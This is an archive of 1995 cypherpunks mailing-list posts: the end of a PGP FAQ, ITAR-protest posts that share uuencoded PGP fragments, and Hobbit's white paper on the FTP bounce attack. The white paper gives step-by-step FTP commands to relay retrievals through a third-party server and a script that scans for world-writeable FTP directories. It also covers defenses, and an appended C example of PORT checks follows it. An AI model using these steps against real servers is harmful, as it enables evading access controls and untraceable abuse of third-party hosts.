ftp://ftp.csn.net/mpj/public/pgp/pgp-msgs-japanese.tar.gz

Lithuanian

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_lithuanian.zip
ftp://ftp.csn.net/mpj/public/pgp/pgp23ltk.zip

Norwegian

ftp://ftp.ox.ac.uk/pub/crypto/pgp/languate/pgp23_norwegian.tar.gz
ftp://ftp.ox.ac.uk/pub/crypto/pgp/languate/pgp26i_norwegian.zip

Romanian

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26_romanian.tar.gz
ftp://ftp.encomix.es/pub/pgp/lang/pgp-romanian.zip
http://www.info.polymtl.ca/zuse/tavi/www/archive/ro_2.6.2.zip
http://www.info.polymtl.ca/zuse/tavi/www/archive/language.txt

Russian

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26_russian.zip
ftp://ftp.kiae.su/unix/crypto/pgp/pgp26ru.zip
ftp://ftp.csn.net/mpj/public/pgp/pgp26ru.zip

Spanish

ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.spanish.tar.gz
ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/pgp-lang.spanish.tar.gz
ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.spanish.tar.gz

Swedish

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_swedish.txt
ftp://ftp.csn.net/mpj/public/pgp/pgp_swedish.txt


IS PGP LEGAL?

Pretty Good Privacy is legal if you follow these rules:

Don't export PGP from the USA except to Canada, or from
Canada except to the USA, without a license.

If you are in the USA, use either Viacrypt PGP (licensed
for commercial use) or MIT PGP using RSAREF (limited to
personal, noncommercial use).  Outside of the USA, where
RSA is not patented, you may prefer to use a version of
PGP (2.6.i) that doesn't use RSAREF to avoid the
restrictions of that license.

If you are in a country where the IDEA cipher patent
holds in software (including the USA, Canada, and some
countries in Europe), make sure you are licensed to use
the IDEA cipher commercially before using PGP
commercially.  (No separate license is required to use
the freeware PGP for personal, noncommercial use).  For
direct IDEA licensing, contact Ascom Systec.

Ascom Systec has taken over the distribution of IDEA
licenses effective April 1, 1995. Erhard Widmer is the
person responsible for the sales aspects, and Peter
Hartmann is responsible for the technical aspects. They
can be reached as follows:


Erhard Widmer,  Ascom Systec AG, Dep't. CMVV      Phone  ++41 64 56 59 83
Peter Hartmann, Ascom Systec AG, Dep't. CMN       Phone  ++41 64 56 59 45

Fax:            ++41 64 56 59 90
e-mail:         IDEA@ascom.ch
Mail address:   Gewerbepark, CH-5506 Maegenwil (Switzerland)

Don't sell PGP based on Philip Zimmermann's source code in
North America unless you are reselling for Viacrypt (because
they have an exclusive marketing agreement on Philip
Zimmermann's copyrighted code). (Selling shareware/freeware
disks or connect time is OK).  This restriction might be
lifted with PGP 3.0, since it is a complete rewrite by Colin
Plumb.  Distribution and use restrictions on that version are
still to be determined.

If you modify PGP (other than porting it to another platform
or adapting it to another compiler), don't call it PGP (TM)
or Pretty Good Privacy (TM) without Philip Zimmermann's
permission.


WHAT IS PHILIP ZIMMERMANN'S LEGAL STATUS?

Philip Zimmermann is under investigation for alleged violation
of export regulations, with a grand jury hearing evidence.
There is speculation that the Feds are trying to make an
example of Phil with prolonged and expensive legal
proceedings, thus reaping a reward of Fear, Uncertainty, and
Doubt to discourage development and use of strong crypto in the
USA.

Even though people in this country are considered innocent
until proven guilty, there is a problem with the system in that
it can take lots of money for innocent folks to defend
themselves.  Because of the broad implications for freedom,
privacy, and the First Amendment of the U. S. Constitution in
this case, I implore all of you who can to help out with Phil's
rather significant legal and travel expenses involved in his
defense.  Phil is a nice guy with a wife and two children to
support, and he has done a great deal in his PGP social
activism to help all of us.

To send a check or money order by mail, make it payable, NOT to
Phil Zimmermann, but to "Philip L. Dubois, Attorney Trust
Account."  Mail the check or money order to the following
address:

Philip Dubois
2305 Broadway
Boulder, CO USA 80304
(Phone #: 303-444-3885)

To send a wire transfer, your bank will need the following
information:

Bank: VectraBank
Routing #: 107004365
Account #: 0113830
Account Name: "Philip L. Dubois, Attorney Trust Account"

To contribute using your credit card (secured with PGP), simply
compose a message in plain ASCII text giving the following: the
recipient ("Philip L.  Dubois, Attorney Trust Account"); the
bank name of your VISA or MasterCard; the name which appears on
it (yours, hopefully :-)); a telephone number at which you can
be reached in case of problems; the card number; date of
expiry; and, most important, the amount you wish to donate.
(Make this last item as large as possible.) Then use PGP to
encrypt and ASCII-armor the message using Phil Dubois's public
key, distributed with PGP 2.6.2.  E-mail the output file to
Phil Dubois (dubois@csn.org).
Please be sure to use a "Subject:" line reading something like
"Phil Zimmermann Defense Fund" so he'll know to decrypt it
right away.


WHERE CAN I GET WINDOWS & DOS SHELLS FOR PGP?

http://www.ifi.uio.no/~staalesc/AutoPGP.html
ftp://oak.oakland.edu/SimTel/msdos/security/apgp22b.zip
ftp://oak.oakland.edu/SimTel/win3/security/pgpw40.zip
http://alpha.netaccess.on.ca/~spowell/crypto/pwf31.zip
ftp://ftp.netcom.com/pub/dc/dcosenza/pgpw40.zip
ftp://Sable.ox.ac.uk/pub
ftp://ftp.firstnet.net/pub/windows/winpgp/pgpw40.zip  <WinPGP's home site>
http://www.firstnet.net/~cwgeib/welcom.html
ftp://ftp.netcom.com/pub/ec/ecarp/pgpwind.zip
http://www.eskimo.com/~joelm (Private Idaho)
ftp://ftp.eskimo.com/~joelm
http://www.xs4all.nl/~paulwag/security.htm
http://www.LCS.com/winpgp.html
ftp://mirrors.aol.com/mir01/circa/pub/pc/win3/util/pwf31.zip
http://netaccess.on.ca/~rbarclay/index.html
http://netaccess.on.ca/~rbarclay/pgp.html
ftp://ftp.leo.org/pub/comp/os/os2/crypt/gcppgp10.zip
ftp://ftp.leo.org/pub/comp/os/os2/crypt/pmpgp.zip

Compuserve:
Library 3, European Forum.
Library 6, NCSA Forum
PCWorld Online Forum.
WUGNET Forum.
WinShare Forum

See also the BBS list for PGP, above.


WHERE CAN I GET THE MACPGP KIT?

ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGP_icons.sit.hqx
ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkit.hqx
ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkitSources.sit.hqx
ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_tools/MacPGPkit1.6.sit

OTHER MAC ADD-ONS

ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_tools/ChainMail.0.7.sit
ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_tools/Eudora->PGP Scripts1.5.sit
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/pgp/mac/AppleScripts


WHERE IS THE PGP 3.0 API DRAFT?

The (prelim. draft) PGP 3.0 API is at:

ftp://ftp.netcom.com/pub/dd/ddt/crypto/crypto_info/950212 pgp3spec.txt
All comments on it for the PGP 3.0 API Team should be sent to:
pgp@lsd.com


WHAT OTHER FILE ENCRYPTION (DOS, MAC) TOOLS ARE THERE?

PGP can do conventional-only encryption of a file (the -c option),
but you might want to investigate some of the other
alternatives if you do this a lot.  Alternatives include
Quicrypt and Atbash2 for DOS, DLOCK for DOS & UNIX, Curve
Encrypt (for the Mac), HPACK (many platforms), and a few
others.

Quicrypt is interesting in that it comes in two flavors:
shareware exportable and registered secure.  Atbash2 is
interesting in that it generates ciphertext that can be read
over the telephone or sent by Morse code.  DLOCK is a no-frills
strong encryption program with complete source code.  Curve
Encrypt has certain user-friendliness advantages.  HPACK is an
archiver (like ZIP or ARC), but with strong encryption.

A couple of starting points for your search are:

ftp://ftp.csn.net/mpj/qcrypt10.zip
ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/file/
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/file/
(see ftp://ftp.csn.net/mpj/README for the ???????)
ftp://ftp.miyako.dorm.duke.edu/mpj/crypto/file/


HOW DO I SECURELY DELETE FILES (DOS)?

If you have the Norton Utilities, Norton WipeInfo is pretty
good.  I use DELETE.EXE in del110.zip, which is really good at
deleting existing files, but doesn't wipe "unused" space.

ftp://ftp.csn.net/mpj/public/del110.zip
ftp://ftp.demon.co.uk/pub/ibmpc/security/realdeal.zip


WHAT DO I DO ABOUT THE PASS PHRASE IN MY WINDOWS SWAP FILE?

The nature of Windows is that it can swap any memory to disk at
any time, meaning that all kinds of interesting things could
end up in your swap file.

ftp://ftp.firstnet.net/pub/windows/winpgp/wswipe.zip


WHAT EVER HAPPENED TO PGPfone(tm)?

It is still in the design stages, with a release target of August 1st.
Get Nautilus, instead, for now.


WHERE DO I GET NAUTILUS?

Bill Dorsey, Pat Mullarky, and Paul Rubin have come out with a
program called Nautilus that enables you to engage in secure
voice conversations between people with multimedia PCs and
modems capable of at least 9600 bps.

See

ftp://ripem.msu.edu/pub/crypt/GETTING_ACCESS
ftp://ripem.msu.edu/pub/crypt/other/naut091.zip

ftp://ftp.csn.net/mpj/README
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/voice/naut091.zip

ftp://ftp.netcom.com/pub/mp/mpj/README
ftp://ftp.netcom.com/pub/mp/mpj/I_will_not_export/crypto_???????/voice/naut091.zip

ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS
ftp://miyako.dorm.duke.edu/mpj/crypto/voice/naut091.zip
The Colorado Catacombs BBS 303-772-1062

ftp://ftp.ox.ac.uk/pub/crypto/misc


HOW DO I ENCRYPT MY DISK ON-THE-FLY?

Rather than manually encrypting and decrypting files, it is
sometimes easier (and therefore more secure, because you are
more likely to use it) to use a utility that encrypts or
decrypts files on the fly as you use them in your favorite
applications.  This also allows you to automatically encrypt
temporary files generated by your applications if they are on
the encrypted volume.

http://www.cs.auckland.ac.nz/~pgut01/sfs.html
ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/disk/
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/disk/
(see ftp://ftp.csn.net/mpj/README for the ???????)
ftp://miyako.dorm.duke.edu/mpj/crypto/disk/
ftp://ftp.nic.surfnet.nl/surfnet/net-security/encryption/disk/
ftp://ftp.demon.co.uk/pub/ibmpc/secdev/secdev14.arj

EMAIL/PGP LINKS

http://cag-www.lcs.mit.edu/mailcrypt/ (EMACS LISP)


WHERE IS PGP'S COMPETITION?

RIPEM is the second most popular freeware email encryption
package.  I like PGP better for lots of reasons, but if for
some reason you want to check or generate a PEM signature,
RIPEM is available at ripem.msu.edu.  There is also an
exportable RIPEM/SIG.

ftp://ripem.msu.edu/pub/GETTING_ACCESS


HOW DO I PUBLISH MY PGP PUBLIC KEY?

Send mail to one of these addresses with the single word "help"
in the subject line to find out how to use them.  These servers
synchronize keys with each other.

pgp-public-keys@burn.ucsd.edu
pgp-public-keys@pgp.cc.gatech.edu
pgp-public-keys@goliat.upc.es
pgp-public-keys@demon.co.uk
pgp-public-keys@dsi.unimi.it
pgp-public-keys@ext221.sra.co.jp
pgp-public-keys@fbihh.informatik.uni-hamburg.de
pgp-public-keys@jpunix.com
pgp-public-keys@kiae.su
pgp-public-keys@kr.com
pgp-public-keys@kram.org
pgp-public-keys@kub.nl
pgp-public-keys@nexus.hpl.hp.com
pgp-public-keys@pgp.ai.mit.edu
pgp-public-keys@pgp.barclays.co.uk
pgp-public-keys@gondolin.org
pgp-public-keys@pgp.dhp.com
pgp-public-keys@pgp.hpl.hp.com
pgp-public-keys@pgp.iastate.edu
pgp-public-keys@pgp.kr.com
pgp-public-keys@pgp.mit.edu
pgp-public-keys@pgp.ox.ac.uk
pgp-public-keys@pgp.pipex.net
pgp-public-keys@srce.hr
pgp-public-keys@sw.oz.au
pgp-public-keys@uit.no
pgp-public-keys@vorpal.com
pgp-public-keys@nic.surfnet.nl

WWW interface to the key servers:
http://www-swiss.ai.mit.edu/~bal/pks-toplev.html
http://www-lsi.upc.es/~alvar/pks/pks-toplev.html

For $20/year or so, you can have your key officially certified
and published in a "clean" key database that is much less
susceptible to denial-of-service attacks than the other key
servers.  Send mail to info-pgp@Four11.com for information, or
look at http://www.Four11.com/

PGP public keys which are stored on SLED's Four11 Key Server are
now retrievable by fingering UserEmailAddress@publickey.com.

Example:  My e-mail address is mpj@csn.org

finger mpj@csn.org@publickey.com

My key (mpj8) is at Four11.com, at ftp://ftp.csn.net/mpj/mpj8.asc,
on the key servers, on my BBS, and available by finger.


WHICH FAQ IS THE OFFICIAL ONE?

The main alt.security.pgp FAQ is published by Jeff A. Licquia,
jalicqui@prairienet.org; and is available at

ftp://ftp.prairienet.org/pub/providers/pgp/pgpfaq.txt

This shorter FAQ just covers a few of the most frequent
questions and points you to the main FAQ for more answers.
This file is ftp://ftp.csn.net/mpj/getpgp.asc, and is available in two
parts for more limited nets as ftp://ftp.csn.net/mpj/getpgp1.asc and
ftp://ftp.csn.net/mpj/getpgp2.asc

There are some other periodic FAQ-related postings, too, like
the miniFAQ posted by Andre Bacard, which is more about
promoting the use of PGP than where to get it or how to use
it.

FAQs are also posted to news.answers and alt.answers, and
archived at rtfm.mit.edu.




CAN I COPY AND REDISTRIBUTE THIS FAQ?

Permission is granted to distribute unmodified copies of this FAQ.


                 ___________________________________________________________
                |                                                           |
|\  /| |        | Michael Paul Johnson  Colorado Catacombs BBS 303-772-1062 |
| \/ |o|        | PO Box 1151, Longmont CO 80502-1151 USA   Jesus is alive! |
|    | | /  _   | mpj@csn.org aka mpj@netcom.com m.p.johnson@ieee.org       |
|    |||/  /_\  | ftp://ftp.csn.net/mpj/README.MPJ          CIS: 71331,2332 |
|    |||\  (    | ftp://ftp.netcom.com/pub/mp/mpj/README  -. --- ----- .... |
|    ||| \ \_/  | PGPprint=F2 5E A1 C1 A6 CF EF 71  12 1F 91 92 6A ED AE A9 |
                |___________________________________________________________|





-----BEGIN PGP SIGNATURE-----
Version: 2.7.1

iQCVAwUBMANugfX0zg8FAL9FAQHn+gP/RmULFLJI0FkqmU2Tne5+Xjoy4ZAM5CAU
IPaMIbi6Hbqsx2zbVZgPnu4TetXW1hKCRLMcsUoKimJX5cc1LugNhM0IjhBwfN+D
3sfN09KBhGD6f949sg/D4c6BuSfU//d841UEDD4hSfik5D5pPqoPr5tVciYeCC+A
d3wqHiPyNzw=
=Hj3T
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Tue, 11 Jul 95 23:23:32 PDT
To: cypherpunks@toad.com
Subject: Re: Down with ITAR - Have YOU exported PGP today? (fwd)
Message-ID: <199507120629.BAA17204@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


Only slightly bummed owner of part 015  :-/

Dave Merriman

>                                   PGP.ZIP Part [014/713]
>-
>------------------------------------------------------------------------------
>--------------------------------------------------------
>MD(<YF(IH^,(%3^L1/[['"@Q!#[3!8^*]B72\"SES5XK>?HQM7&Q(.V,-WL8P
>M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
>MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
>-
>------------------------------------------------------------------------------


This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NMundy5276@aol.com
Date: Tue, 11 Jul 95 22:57:59 PDT
To: adam@bwh.harvard.edu
Subject: Re: Down with ITAR - Have YOU exported PGP today? (fwd)
Message-ID: <950712015748_30934874@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

      OK! I've got mine, let's rock. Here's part 14. Who's got 15!



                                   PGP.ZIP Part [014/713]
-
------------------------------------------------------------------------------
--------------------------------------------------------
MD(<YF(IH^,(%3^L1/[['"@Q!#[3!8^*]B72\"SES5XK>?HQM7&Q(.V,-WL8P
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
-
------------------------------------------------------------------------------
--------------------------------------------------------
Get your chunk now, it's going fast!
For next chunk to export----->http://dcs.ex.ac.uk/~aba/export/
____________________________________________________________________________
____________________________________________________________________________
#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL  
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)
10 let nsa=cluless \ gosub 10 \ delete-statist-gov.nonsense-nsa-batf-ect..!
____________________________________________________________________________
____________________________________________________________________________
nmundy5276@aol.com---Nicholas Mundy +       Civilized by choice.
finger or e-mail for public key              +        Anarchist by nature.
PGP encrypted mail prefered       + Additude subject to change without
notice!
____________________________________________________________________________
____________________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMANiyhz5+ljeFhgRAQGGrAf/WK1kEY45FwtWXLbFnb2yUrkEHNDcE97N
VjAtp0WRwdG0FD1KOnKG52cvD/RXMppkfkLwf/S29ZVE+U37DYfZy2CM7UMyckuk
K0uvyaJX7EqkYsB3SbNv3ZjYd53pO7xyWOSwMLjy/HGfTDMk2A/HkSSGpJP4G7rU
m8JgT/GrbS+sETU8F4dL9GvCIbHTncKypL898kofrHnJUAYESR+IEQz3Tl8iF+Rf
87JoqBPgCrnBBXkv7hEvTQSWnGJY/6u4Ym/3/sRRgs+42eKYtDY3GztAoY7oXMpk
pEqgJCSMaTfSvln3vm8ju3jIWmFtdpHOrp3msVPT+AodIW18iZx+fQ==
=Er7K
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: *Hobbit* <hobbit@avian.org>
Date: Wed, 12 Jul 95 00:13:42 PDT
To: nobody@narq.avian.org
Subject: The FTP Bounce Attack
Message-ID: <199507120620.CAA18176@narq.avian.org>
MIME-Version: 1.0
Content-Type: text/plain


This discusses one of many possible uses of the "FTP server bounce attack".
The mechanism used is probably well-known, but to date interest in detailing
or fixing it seems low to nonexistent.  This particular example demonstrates
yet another way in which most electronically enforced "export restrictions" are
completely useless and trivial to bypass.  It is chosen in an effort to make
the reader sit up and notice that there are some really ill-conceived aspects
of the standard FTP protocol.

Thanks also to Alain Knaff at imag.fr for a brief but entertaining discussion
of some of these issues a couple of months ago which got me thinking more
deeply about them.

The motive
==========

You are a user on foreign.fr, IP address F.F.F.F, and want to retrieve
cryptographic source code from crypto.com in the US.  The FTP server at
crypto.com is set up to allow your connection, but deny access to the crypto
sources because your source IP address is that of a non-US site [as near as
their FTP server can determine from the DNS, that is].  In any case, you
cannot directly retrieve what you want from crypto.com's server.

However, crypto.com will allow ufred.edu to download crypto sources because
ufred.edu is in the US too.  You happen to know that /incoming on ufred.edu
is a world-writeable directory that any anonymous user can drop files into and
read them back from.  Crypto.com's IP address is C.C.C.C.

The attack
==========

This assumes you have an FTP server that does passive mode.  Open an FTP
connection to your own machine's real IP address [not localhost] and log in.
Change to a convenient directory that you have write access to, and then do:

	quote "pasv"
	quote "stor foobar"

Take note of the address and port that are returned from the PASV command,
F,F,F,F,X,X.  This FTP session will now hang, so background it or flip to
another window or something to proceed with the rest of this.

Construct a file containing FTP server commands.  Let's call this file
"instrs".  It will look like this:

	user ftp
	pass -anonymous@
	cwd /export-restricted-crypto
	type i
	port F,F,F,F,X,X
	retr crypto.tar.Z
	quit
	^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
	^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
	...

F,F,F,F,X,X is the same address and port that your own machine handed you
on the first connection.  The trash at the end is extra lines you create,
each containing 250 NULLS and nothing else, enough to fill up about 60K of
extra data.  The reason for this filler is explained later.

Open an FTP connection to ufred.edu, log in anonymously, and cd to /incoming.
Now type the following into this FTP session, which transfers a copy of your
"instrs" file over and then tells ufred.edu's FTP server to connect to
crypto.com's FTP server using your file as the commands:

	put instrs
	quote "port C,C,C,C,0,21"
	quote "retr instrs"

Crypto.tar.Z should now show up as "foobar" on your machine via your first FTP
connection.  If the connection to ufred.edu didn't die by itself due to an
apparently common server bug, clean up by deleting "instrs" and exiting.
Otherwise you'll have to reconnect to finish.

Discussion
==========

There are several variants of this.  Your PASV listener connection can be
opened on any machine that you have file write access to -- your own, another
connection to ufred.edu, or somewhere completely unrelated.  In fact, it does
not even have to be an FTP server -- any utility that will listen on a known
TCP port and read raw data from it into a file will do.  A passive-mode FTP
data connection is simply a convenient way to do this.

The extra nulls at the end of the command file are to fill up the TCP windows
on either end of the ufred -> crypto connection, and ensure that the command
connection stays open long enough for the whole session to be executed.
Otherwise, most FTP servers tend to abort all transfers and command processing
when the control connection closes prematurely.  The size of the data is enough
to fill both the receive and transmit windows, which on some OSes are quite
large [on the order of 30K].  You can trim this down if you know what OSes
are on either end and the sum of their default TCP window sizes.  It is split
into lines of 250 characters to avoid overrunning command buffers on the target
server -- probably academic since you told the server to quit already.

If crypto.com disallows *any* FTP client connection from you at foreign.fr and
you need to see what files are where, you can always put "list -aR" in your
command file and get a directory listing of the entire tree via ufred.

You may have to retrieve your command file to the target's FTP server in ASCII
mode rather than binary mode.  Some FTP servers can deal with raw newlines, but
others may need command lines terminated by CRLF pairs.  Keep this in mind when
retrieving files to daemons other than FTP servers, as well.

Other possibilities
===================

Despite the fact that such third-party connections are one-way only, they
can be used for all kinds of things.  Similar methods can be used to post
virtually untraceable mail and news, hammer on servers at various sites, fill
up disks, try to hop firewalls, and generally be annoying and hard to track
down at the same time.  A little thought will bring realization of numerous
other scary possibilities.

Connections launched this way come from source port 20, which some sites allow
through their firewalls in an effort to deal with the "ftp-data" problem.  For
some purposes, this can be the next best thing to source-routed attacks, and is
likely to succeed where source routing fails against packet filters.  And it's
all made possible by the way the FTP protocol spec was written, allowing
control connections to come from anywhere and data connections to go anywhere.

Defenses
========

There will always be sites on the net with creaky old FTP servers and
writeable directories that allow this sort of traffic, so saying "fix all
the FTP servers" is the wrong answer.  But you can protect your own against
both being a third-party bouncepoint and having another one used against you.

The first obvious thing to do is allow an FTP server to only make data
connections to the same host that the control connection originated from.
This does not prevent the above attack, of course, since the PASV listener
could just as easily be on ufred.edu and thus meet that requirement, but
it does prevent *your* site from being a potential bouncepoint.  It also
breaks the concept of "proxy FTP", but hidden somewhere in this paragraph
is a very tiny violin.

The next obvious thing is to prohibit FTP control connections that come from
reserved ports, or at least port 20.  This prevents the above scenario as
stated.

Both of these things, plus the usual poop about blocking source-routed packets
and other avenues of spoofery, are necessary to prevent hacks of this sort.
And think about whether or not you really need an open "incoming" directory.

Only allowing passive-mode client data connections is another possibility,
but there are still too many FTP clients in use that aren't passive-aware.

"A loose consensus and running code"
====================================

There is some existing work addressing this available here at avian.org [and
has been for several months, I might add] in the "fixkits archive".  Several
mods to wu-ftpd-2.4 are presented, which include code to prevent and log
attempts to use bogus PORT commands.  Recent security fixes from elsewhere are
also included, along with s/key support and various compile-time options to
beef up security for specific applications.

Stan Barber at academ.com is working on merging these and several other fixes
into a true updated wu-ftpd release.  There are a couple of other divergent
efforts going on.  Nowhere is it claimed that any of this work is complete yet,
but it is a start toward something I have had in mind for a while -- a
network-wide release of wu-ftpd-2.5, with contributions from around the net. 
The wu-ftpd server has become very popular, but is in sad need of yet another
security upgrade.  It would be nice to pull all the improvements together into
one coordinated place, and it looks like it will happen.  All of this still
won't help people who insist on running vendor-supplied servers, of course.

Sanity-checking the client connection's source port is not implemented
specifically in the FTP server fixes, but in modifications to Wietse's
tcp-wrappers package since this problem is more general.  A simple PORT option
is added that denies connections from configurable ranges of source ports at
the tcpd stage, before a called daemon is executed.

Some of this is pointed to by /src/fixkits/README in the anonymous FTP
area here.  Read this roadmap before grabbing other things.

Notes
=====

Adding the nulls at the end of the command file was the key to making this
work against a variety of daemons.  Simply sending the desired data would
usually fail due to the immediate close signaling the daemon to bail out.

If WUSTL has not given up entirely on the whole wu-ftpd project, they are
keeping very quiet about further work.  Bryan O'Connor appears to have many
other projects to attend to by now...

This is a trivial script to find world-writeable and ftp-owned directories and
files on a unix-based anonymous FTP server.  You'd be surprised how many of
those writeable "bouncepoints" pop out after a short run of something like
this.  You will have to later check that you can both PUT and GET files from
such places; some servers protect uploaded files against reading.  Many do not,
and then wonder why they are among this week's top ten warez sites...

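#!/bin/sh
# $1 = hostname of the anonymous FTP server to list.
# Log in anonymously and save a recursive listing of the tree in xxx.<pid>.
ftp -n "$1" << FOE
quote "user ftp"
quote "pass -nobody@"
prompt
cd /
dir "-aR" xxx.$$
bye
FOE
# Not smart enough to figure out ftp's numeric UID if no passwd file!
# Print each directory header once, followed by the entries in it that are
# world-writeable or owned by user "ftp".
cat -v xxx.$$ | awk '
  BEGIN { idir = "/" ; dirp = 0 }
  /.:$/ { idir = $0 ; dirp = 1 ; }
  /^[-d][-r](......w.|........  *[0-9]* ftp  *)/ {
    if (dirp == 1) print idir
    dirp = 0
    print $0
  } '
rm xxx.$$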

I suppose one could call this a white paper.  It is up for grabs at avian.org
in /random/ftp-attack as well as being posted in various relevant places.

_H*  950712
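
The two server-side checks from the Defenses section above, written out in C as an added example; it is not part of the original post and is not the wu-ftpd or tcp-wrappers modifications the post mentions. All function names and the sample addresses are assumptions, and refusing data ports below 1024 is an extra rule beyond the post's two, in line with RFC 2577.

```c
/* Added example (not wu-ftpd or tcp-wrappers code): server-side checks
 * against being used as an FTP bouncepoint. All names are hypothetical. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

enum port_verdict {
    PORT_OK = 0,
    PORT_MALFORMED,     /* not exactly six decimal fields in 0..255 */
    PORT_FOREIGN_HOST,  /* data address is not the control-connection peer */
    PORT_LOW_PORT       /* data port < 1024 (extra rule, see lead-in) */
};

static uint32_t ip4(unsigned a, unsigned b, unsigned c, unsigned d)
{
    return ((uint32_t)a << 24) | ((uint32_t)b << 16) | ((uint32_t)c << 8) | d;
}

/* Strictly parse "h1,h2,h3,h4,p1,p2"; returns 0 on success, -1 otherwise. */
static int parse_port_arg(const char *arg, uint32_t *addr, uint16_t *port)
{
    unsigned long f[6];
    const char *p = arg;

    for (int i = 0; i < 6; i++) {
        char *end;
        if (*p < '0' || *p > '9')          /* no sign, space or empty field */
            return -1;
        f[i] = strtoul(p, &end, 10);
        if (end - p > 3 || f[i] > 255)     /* at most three digits, one octet */
            return -1;
        if (i < 5) {
            if (*end != ',')
                return -1;
            p = end + 1;
        } else {
            while (*end == '\r' || *end == '\n')   /* tolerate line ending */
                end++;
            if (*end != '\0')
                return -1;
        }
    }
    *addr = ip4((unsigned)f[0], (unsigned)f[1], (unsigned)f[2], (unsigned)f[3]);
    *port = (uint16_t)((f[4] << 8) | f[5]);
    return 0;
}

/* Decide whether the server may open a data connection for this PORT
 * argument, given the address the control connection came from. */
enum port_verdict check_port_command(const char *arg, uint32_t control_peer)
{
    uint32_t addr;
    uint16_t port;

    if (parse_port_arg(arg, &addr, &port) != 0) {
        fprintf(stderr, "PORT refused: malformed argument\n");
        return PORT_MALFORMED;
    }
    if (addr != control_peer) {
        fprintf(stderr, "PORT refused: %u.%u.%u.%u:%u is not the control peer\n",
                (unsigned)(addr >> 24), (unsigned)((addr >> 16) & 255),
                (unsigned)((addr >> 8) & 255), (unsigned)(addr & 255),
                (unsigned)port);
        return PORT_FOREIGN_HOST;
    }
    if (port < 1024) {
        fprintf(stderr, "PORT refused: reserved data port %u\n", (unsigned)port);
        return PORT_LOW_PORT;
    }
    return PORT_OK;
}

/* Accept a control connection only from a non-reserved source port.
 * A bounced session arrives from port 20, the relaying server's ftp-data. */
int control_source_allowed(uint16_t src_port)
{
    return src_port >= 1024;
}

int main(void)
{
    /* Constructed sample: the real client is 192.0.2.10 (documentation range). */
    uint32_t peer = ip4(192, 0, 2, 10);
    const char *samples[] = {
        "192,0,2,10,195,80",   /* client's own address, port 50000 */
        "198,51,100,7,0,21",   /* third-party host, FTP control port */
        "192,0,2,10,0,21",     /* own address but reserved port */
        "192,0,2,10,195",      /* too few fields */
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("PORT %-20s -> verdict %d\n", samples[i],
               (int)check_port_command(samples[i], peer));
    printf("control from port 20:    %s\n",
           control_source_allowed(20) ? "accept" : "deny");
    printf("control from port 40000: %s\n",
           control_source_allowed(40000) ? "accept" : "deny");
    return 0;
}
```

As the post notes, the same-host rule keeps this server from being a bouncepoint but also breaks proxy FTP, so it belongs behind a configuration switch where third-party transfers are still needed.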




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Wed, 12 Jul 95 04:05:34 PDT
To: cypherpunks@toad.com
Subject: 17 Down, 696 to go.......
Message-ID: <Pine.BSI.3.91.950712060006.1989A-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



